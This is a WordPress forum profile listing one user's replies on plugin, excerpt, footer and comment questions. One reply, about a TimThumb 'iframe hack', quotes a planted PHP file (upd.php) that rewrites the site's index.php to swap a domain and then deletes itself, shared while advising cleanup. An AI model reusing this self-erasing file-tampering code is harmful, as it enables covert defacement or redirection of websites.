x1code
Forum Replies Created
-
Forum: Plugins
In reply to: [MailPoet Newsletters (Previous)] HTML brakeTheme problem…
Forum: Fixing WordPress
In reply to: Order by meta valuesTHX
This helped me to get it working Link
Forum: Everything else WordPress
In reply to: [TimThumb Vulnerability] iframe hackHi,
I hope that I get ride of that s…
1 step – install fresh wp and template
2 change all passwordscheck
wp-configand after that I have found next:
/wp-content/upd.php<?php $file = __FILE__; $pos = strpos($file,'wp-content'); $dir = substr($file,0,$pos); $index = file_get_contents($dir.'index.php'); $index = str_replace('superpuperdomain.com','superpuperdomain2.com',$index); $f = fopen($dir.'index.php',"w"); fputs($f,$index); fclose($f); unlink($file); ?>
and
/wp-content/2b64c2f19d868305aa8bbc2d72902cc5.php
because of that you need to check wp-content
Delete those files.For now is all OK.
Good luck guys… ??
Forum: Everything else WordPress
In reply to: [TimThumb Vulnerability] iframe hackI got it again. Damn.
Forum: Plugins
In reply to: [WordPress HTTPS (SSL)] Two Strange ErrorsDang. Now I see that I have it to…
Forum: Everything else WordPress
In reply to: [TimThumb Vulnerability] iframe hackHi,
it is not in theme files… somewhere else it is. I downloaded fresh wp and I have upload/upgrade all wp sites. Now is OK.
Forum: Everything else WordPress
In reply to: [TimThumb Vulnerability] iframe hackI ha have re upload all wp sites and now is all ok. One one non wp site I notice the same thing but I did the same like and wit wp sites.
Good luck Miles.
Forum: Fixing WordPress
In reply to: How to show links in excerpt?Thank you on tips.
Here is how I do that.function new_trim_excerpt($text) { global $post; if ( '' == $text ) { $text = get_the_content(''); $text = apply_filters('the_content', $text); $text = str_replace('\]\]\>', ']]>', $text); $text = preg_replace('@<script[^>]*?>.*?</script>@si', '', $text); $text = strip_tags($text, '<a>'); $excerpt_length = 80; $words = explode(' ', $text, $excerpt_length + 1); if (count($words)> $excerpt_length) { array_pop($words); array_push($words, '</a><a>ID) . '">Read the Rest...</a>'); $text = implode(' ', $words); } } return $text; } remove_filter('get_the_excerpt', 'wp_trim_excerpt'); add_filter('get_the_excerpt', 'new_trim_excerpt');
Forum: Fixing WordPress
In reply to: How to show links in excerpt?I understand this potential css problems but I can’t find how to make filter to stop striping html from excerpts. Any tip?
Thank you on reply.
Forum: Fixing WordPress
In reply to: Transposh url translation problemSorry for delay. Had work to do. I marked it as resolved.
Thank you for help.Forum: Fixing WordPress
In reply to: Where can I find link fromThis is the end of footer.php
<!– //END CUSTOM FIELDS –>
<?php javascript_footer() ?>
<?php wp_footer(); ?>
<?php echo stripslashes(get_option(“analytics_code”)); ?>
<?php echo stripslashes(get_option(“google_adsensetracking_code”)); ?></body>
</html>And link is in <?php wp_footer(); ?>.
Forum: Fixing WordPress
In reply to: Where can I find link fromNo, this(<?php wp_footer(); ?>) is in footer.php
Forum: Fixing WordPress
In reply to: Post comment problemIs there any custom fix for that or server need to be setup properly?
Forum: Fixing WordPress
In reply to: Post comment problemHi. Thank you on reply. I know what was problem. I didn’t put text in comment box. Now I have new question. When you don’t put valid email, or other info or you didn’t put comment in IE you are redirected to “Error: please enter a valid email address.” but in FF you are redirected to “HTTP 500 – Internal Server Error
The server responded with an error page.”Is there any plugin to make it work like in IE or some other fix for this problem? How I see this is problem for all in WP.
Thank you in advanced.
With regards.